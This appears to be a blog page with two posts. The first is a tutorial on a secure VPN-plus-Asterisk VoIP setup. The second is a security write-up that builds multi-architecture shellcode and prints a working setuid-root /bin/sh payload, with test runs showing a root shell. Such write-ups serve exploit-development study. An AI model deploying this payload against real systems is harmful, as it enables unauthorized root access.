    We already discussed that PKI is a requirement for our little project, because we're not going to use a static key configuration, due to security concerns. PKI allows each client to have his/her own public/private key pair. The first step is to set up our own local Certificate Authority (CA). Fortunately, OpenVPN comes with a tool suite designed to keep PKI management simple, called "easy-rsa." Depending upon your distribution and packaging system, it may be installed in various directories; for Debian, it's /usr/doc/openvpn/examples/easy-rsa/2.0. Go ahead and copy that directory into your VPN user's home directory.
    # cp -r /usr/doc/openvpn/examples/easy-rsa/2.0 ~/easy-rsa
    # cd ~/easy-rsa
    Now, using your favorite editor, open up the file named vars.
    # vi vars
    As you can see, you can define key length and other variables associated with the keys that will be generated while using the easy-rsa suite. Go ahead and make any changes that you feel necessary for this step. You will be asked again if you want to change any of the variables listed at the bottom during the key building process.
    Now we're going to build the actual CA certificates with the following commands.
    # . ./vars
    # ./clean-all
    # ./build-ca
    Follow the prompts and change anything that you may have forgotten about in the vars file.
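    To double-check what build-ca produced, openssl can print the new CA certificate's subject and validity window (easy-rsa 2.x writes its output to the keys/ subdirectory by default):

```shell
# Print the subject line and notBefore/notAfter dates of the CA certificate.
openssl x509 -in keys/ca.crt -noout -subject -dates
```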

    Build OpenVPN Client / Server & DH Keys

    # ./build-key-server fishbowl
    # ./build-key client1
    # ./build-key client2
    # ./build-dh
    Again, follow the prompts for each command in order to generate the required key pairs.
    It is important to note that each private key (file name ends in .key) must be protected in order to maintain network integrity. Key exchanges must be conducted across secure lines of communication. This could mean directly handing over the keys in person on an encrypted device, or a prearranged symmetric cryptography solution; the options are limited only by your imagination.
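    One simple way to confirm a key survived the exchange intact is to compare digests on both ends over a trusted channel; the path below is an example, and any of the generated .key files works the same way:

```shell
# Both parties run this on their copy and compare digests out of band;
# a mismatch means the key was altered in transit.
sha256sum keys/client1.key
```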

    Configure OpenVPN Server File

    I have an example configuration available over on Github. If you'd like to change any of the variables, please do so at this time. You can change listening address, LAN IP space, key locations and so on. Save the server.conf file to /etc/openvpn/server.conf. Now we need to pull in the keys we previously created using easy-rsa.
    # cp -r ~/easy-rsa/keys /etc/openvpn/keys
    # chmod 700 /etc/openvpn/keys

    Start OpenVPN Server

    # openvpn /etc/openvpn/server.conf

    Configure the Client for OpenVPN

    As previously discussed, transferring private keys requires a great deal of thought and security. You should have a chosen method for key distribution (one that involves physical media, not transmitting the keys over plaintext protocols), and send each client the following files.
    • client.key
    • client.crt
    • ca.crt
    • fishbowl.conf
    For my example fishbowl.conf, just clone the github repo over at Fish Bowl Configs. You will need to change the server IP address to match your own OpenVPN server.
    You now have a fully functional VPN configuration. Generate as many client keys as needed, and send each client the appropriate configuration files. Now it's time to move on to Asterisk.
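    For reference, a minimal client configuration along these lines looks roughly like the sketch below. The address 203.0.113.10 is a placeholder for your server, and the repo copy remains the authoritative version:

```
client
dev tun
proto udp
remote 203.0.113.10 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
verb 3
```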

    Setting up Asterisk

    Asterisk is a full featured, open source PBX solution that includes all of the supported features that we require for this exercise. First of all, we're going to go ahead and install Asterisk onto our respective servers. Again, you can host this on the same box as the VPN or on any number of platform choices. If you're going to run it on another computer, you'll need to generate VPN keys so that it can connect through the VPN. Use the previous steps to set this up. I am again giving the commands for installing this on a Debian based system. For my configuration, I'll be placing the Asterisk box on the same server as OpenVPN. Keep this in mind, and change your IPs / Network segments accordingly.

    Installing Asterisk

    # apt-get install asterisk

    Generate TLS keys for use with SIP

    Now we will generate the required keys in order to use TLS to encrypt our SIP signalling. First we need to create the directory to store our keys in. Similar to OpenVPN, Asterisk also comes with its own scripts to help ease the task of creating cryptographic keys. The script lives at "contrib/scripts/ast_tls_cert" in the Asterisk source; in case you're using the Debian packages, I've included a copy in the github repository. You'll be asked for a password to use with the Certificate Authority for signing additional keys. Pick something secure that you'll also be able to remember in the future.
    # mkdir /etc/asterisk/keys
    # ./ast_tls_cert -C -O "Fish Bowl Communications" -d /etc/asterisk/keys
    This creates quite a few files under /etc/asterisk/keys. The ca.crt is important because it must be distributed to the clients. We also still need to create additional keys for the clients so they can communicate with Asterisk. Go ahead and create two certificates, for client1 and client2 respectively.
    # ./ast_tls_cert -m client -c /etc/asterisk/keys/ca.crt -k /etc/asterisk/keys/ca.key -C client1 -O "Fish Bowl Communications" -d /etc/asterisk/keys -o client1
    # ./ast_tls_cert -m client -c /etc/asterisk/keys/ca.crt -k /etc/asterisk/keys/ca.key -C client2 -O "Fish Bowl Communications" -d /etc/asterisk/keys -o client2
    After completing the above steps, you can see that the following files were created in /etc/asterisk/keys.
    • asterisk.crt
    • asterisk.csr
    • asterisk.key
    • asterisk.pem
    • client1.crt
    • client1.csr
    • client1.key
    • client1.pem
    • client2.crt
    • client2.csr
    • client2.key
    • client2.pem
    • ca.cfg
    • ca.crt
    • ca.key
    • tmp.cfg
    In order for the clients to be able to connect, you need to add client1.pem or client2.pem (depending on the client) to their computer along with ca.crt. We'll cover client configuration later.

    Configure sip.conf

    Now that our certificates are in order for SIP, we'll walk through the configuration of SIP in Asterisk. Open up /etc/asterisk/sip.conf with your favorite editor and let's get to work. Remember, all of my configs can be downloaded over on the FishBowl github.
    The first section you're going to come to that needs to be changed is the UDP/TCP bind area. You can comment out the sections dealing with bind addresses for both, because we are going to require TLS as the transport medium. Once you come across the lines regarding TLS configuration, we need to start making changes. Make sure that you substitute your own IP address.
    Ensure that TLS is enabled, and change the bind address to match your VPN IP. We don't want it listening on external interfaces, in order to minimize the chance of data leakage.
    Once it gets to the transport medium, we want to force TLS only. Normally the options are TCP or UDP.
    There's another option to further help us lock down who is able to use the Asterisk server. Again, change the IP and netmask to match your VPN settings. Disabling allowguest refuses calls from anyone not associated with the VPN.
    The last main option that we need to change, other than adding clients, is to force real-time media streaming encryption with SRTP. The call will drop if both parties do not offer SRTP support.
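    Pulling the general-section changes above together, a hedged sketch of the relevant sip.conf lines. The 10.8.0.x addresses assume OpenVPN's default subnet, and the exact option names come from chan_sip, so consult the sample sip.conf for your Asterisk version:

```
[general]
tlsenable=yes
tlsbindaddr=10.8.0.1
tlscertfile=/etc/asterisk/keys/asterisk.pem
tlscafile=/etc/asterisk/keys/ca.crt
transport=tls
allowguest=no
deny=0.0.0.0/0.0.0.0
permit=10.8.0.0/255.255.255.0
encryption=yes
```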
    Set up two clients in the SIP config at the bottom of the file.
    [client1]
    context=local      ; this will be used in extensions.conf
    allow=g722         ; choose the codecs that you prefer here.

    [client2]
    context=local      ; this will be used in extensions.conf
    allow=g722         ; choose the codecs that you prefer here.
    Now we are able to login to the Fish Bowl Communications Network. We cannot however place any legitimate calls, until we setup the extensions.

    Configuring extensions.conf

    We're only going to cover the most basic extension configuration in this article, since the sole focus is not the Asterisk system; entire books have been dedicated to that subject already. Open up extensions.conf and go down to the [local] section, because that is the context given to both client1 and client2. We're simply going to add a Dial call routine and an extension for each of the SIP clients.
    exten => 100,1,Dial(SIP/client1)
    exten => 101,1,Dial(SIP/client2)
    The above configuration will dial client1 if anyone dials extension 100 and client2 if anyone dials extension 101. The 1 here indicates that it is the first step in the call process. Asterisk allows you to set up extensive voice prompts and menus for callers, as well as conference bridges, fax documents, voice mail, call parking lots, etc. This will however meet our BARE requirements for making secure phone calls over a VPN with fully encrypted SVoIP. Keep in mind that we need to safeguard keys when transferring them, and client1.pem/client2.pem both contain private keys along with the client certificates.

    Client Configuration

    There are multiple clients available across various platforms that support TLS + SRTP communication methods. I'll show an example of configuring SFLPhone for Linux based systems. The Asterisk wiki contains a good demonstration of setting up Blink on Linux, Windows, or Mac. See resources at the bottom for Blink configuration. If you're using a mobile client, these same principles will apply, and setup on multiple clients should be pretty straight forward.


    Go ahead and install SFLPhone, if you're using Debian based systems, the following will get you started.
    # apt-get install sflphone-gnome
    Once the client is installed, go ahead and start it up. You can use the configuration wizard in order to get you started with configuring the account. Further manipulation will be necessary though. The first screen is a welcome message, press Continue to go on.

    Register an existing SIP or IAX2 account

    SIP (Session Initiation Protocol)

    Fill out Client Information as Shown

    No STUN Server is Needed

    Click Apply and then Close. This is as far as the configuration wizard will take us. From here, we need to go to Edit Menu -> Accounts. Select client1 from the list and click on edit.

    Click on the security tab. For SRTP exchange select SDES. Then select "Use TLS Transport(sips)" and click on Edit.

    Once you're in the advanced security settings, this is where you select the ca.crt and client1.pem files in order to allow TLS to associate your client with the server. Server name should be the Asterisk box, and the default port is 5061 (unless you changed it in sip.conf). Your settings should generally look like the following.

    That's it for client configuration. Go ahead and click Apply, and toggle the option next to client1 under the accounts menu. Once it associates with the server, you should see a message stating that you are "registered" with the server. Assuming that client2 is also connected, go ahead and give them a call and test out the audio (remember, client2 is extension 101 as we set it earlier). You may need to switch codecs depending on connection speed and application.

    Going beyond

    The possibilities are truly endless when it comes to customizing these configurations. One thing that is nice to have is an analog phone converter like the Linksys PAP2T. This type of device allows you to use a normal telephone with the same secure setup. Ensure that your converter supports both TLS and SRTP, if you're going to use this setup. Experiment with adding phone bridges, trunking multiple Asterisk boxes together across the VPN. This article should have provided you with enough information to get you up and running. If you want more specific details, go to the respective wiki links as both Asterisk and OpenVPN have great support networks.


    Thursday, August 29, 2013

    Building multi-architecture shellcode with shellcodecs

    Earlier, when I documented alphanumeric shellcode, I released a stub that determines the x86 CPU architecture, which I called a 'getcpu'. Using a few tools from shellcodecs, I was able to combine it with a couple of other shellcodes and test the compatibility locally.

    Building a 32-bit shellcode loader on a multilib system

    The first thing I did was take the 32-bit loader found in shellcodecs and build it on my 64-bit system to get a decent test environment going.
    root@box:~/Downloads/shellcode/loaders# as --32 loader-32.s -o loader-32.o
    root@box:~/Downloads/shellcode/loaders# ld -m elf_i386 loader-32.o -o loader-32

    Initial codes

    I picked out two setuid(0); execve('/bin/bash',null,null) shellcodes: a 32-bit shellcode used in our buffer overflow wiki, and the 64-bit version that I wrote for shellcodecs, giving us the three portions of code below.
    • The getCPU stub:
    • The 32-bit payload:
    • The 64-bit payload:
    I got the 64-bit payload using the following command from a compiled shellcodecs installation:
    generators/ --file null-free/setuid_binsh --hex

    Tying them together

    The 64-bit payload is 32 bytes, which is 0x20 in hex. Because the getCPU sets the zero flag on 32-bit and doesn't on 64-bit, I took the getCPU and appended a conditional jump-if-equal with an offset of 0x20 ("t\x20"):
    The idea here is that on a 32-bit system it will jump over the 64-bit payload and execute the 32-bit payload. On a 64-bit system it will execute the 64-bit code without continuing into the 32-bit code, because execve() is blocking. I appended the 64-bit payload, followed by the 32-bit payload, to our altered getCPU with the conditional jump:
    This comes out to 94 bytes.
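    That 94-byte figure is easy to sanity-check from the shell, using the same byte string that appears in the test runs below:

```shell
# getCPU (15) + jz (2) + 64-bit payload (32) + 32-bit payload (38) + "/bin/sh" (7) = 94.
printf 'TX4HPZTAZAYVH92t\x20\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x54\x5f\x6a\x3b\x58\x0f\x05\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' | wc -c
```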

    Testing the shellcode

    • On 32-bit:
      root@box:~/Downloads/shellcode/loaders# ./loader-32 "$(echo -en "TX4HPZTAZAYVH92t\x20\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x54\x5f\x6a\x3b\x58\x0f\x05\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh")"
      # id
      uid=0(root) gid=0(root) groups=0(root)
      # exit
    • On 64-bit:
      root@box:~/Downloads/shellcode/loaders# ./loader-64 "$(echo -en "TX4HPZTAZAYVH92t\x20\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x54\x5f\x6a\x3b\x58\x0f\x05\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh")"
      root@box:/home/hats/Downloads/shellcode/loaders# id
      uid=0(root) gid=0(root) groups=0(root)
      root@box:/home/hats/Downloads/shellcode/loaders# exit
    This same trick works for windows shellcodes as well; the getCPU stub does not interfere with operating system internals or cause exceptions to be raised.